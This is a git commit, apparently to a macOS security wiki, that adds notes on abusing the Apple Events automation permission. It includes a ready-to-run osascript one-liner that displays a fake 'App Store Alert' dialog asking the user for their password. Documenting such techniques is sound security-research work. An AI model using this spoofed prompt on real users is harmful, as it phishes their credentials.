GITBOOK-4186: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-12-11 15:49:52 +00:00 committed by gitbook-bot
parent ef14d419ab
commit a4f29b80da
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 10 additions and 0 deletions

View File

@ -106,6 +106,16 @@ Gives **Full Disk Access** permissions, one of the TCC highest permissions you c
Allows the app to send events to other applications that are commonly used for **automating tasks**. Controlling other apps, it can abuse the permissions granted to these other apps.
Like making them ask the user for its password:
{% code overflow="wrap" %}
```bash
osascript -e 'tell app "App Store" to activate' -e 'tell app "App Store" to activate' -e 'tell app "App Store" to display dialog "App Store requires your password to continue." & return & return default answer "" with icon 1 with hidden answer with title "App Store Alert"'
```
{% endcode %}
Or making them perform **arbitrary actions**.
### **`kTCCServiceEndpointSecurityClient`**
Allows, among other permissions, to **write the users TCC database**.